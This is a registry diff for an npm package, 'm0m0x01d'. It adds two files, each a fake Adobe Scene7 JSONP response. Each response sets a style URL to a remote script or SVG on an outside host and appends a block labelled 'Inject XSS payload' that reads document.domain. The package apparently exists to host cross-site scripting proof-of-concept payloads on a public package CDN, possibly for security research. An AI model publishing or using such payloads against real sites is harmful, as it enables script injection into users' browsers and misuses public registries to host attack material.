m0m0x01d 29.0.0 → 31.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/media5.js +13 -0
- package/media6.js +13 -0
- package/package.json +1 -1
package/media5.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"style": "https://brutelogic.com.br/1.js",
|
4
|
+
"type": "MixedMediaHTML5Mobile",
|
5
|
+
"vt": "MediaSetVirtual"
|
6
|
+
}, "192959476");
|
7
|
+
|
8
|
+
// Inject XSS payload after the JSONP function
|
9
|
+
(function() {
|
10
|
+
var xss_payload = document.domain;
|
11
|
+
console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
|
12
|
+
})();
|
13
|
+
|
package/media6.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"style": "https://brutelogic.com.br/poc.svg",
|
4
|
+
"type": "MixedMediaHTML5Mobile",
|
5
|
+
"vt": "MediaSetVirtual"
|
6
|
+
}, "192959476");
|
7
|
+
|
8
|
+
// Inject XSS payload after the JSONP function
|
9
|
+
(function() {
|
10
|
+
var xss_payload = document.domain;
|
11
|
+
console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
|
12
|
+
})();
|
13
|
+
|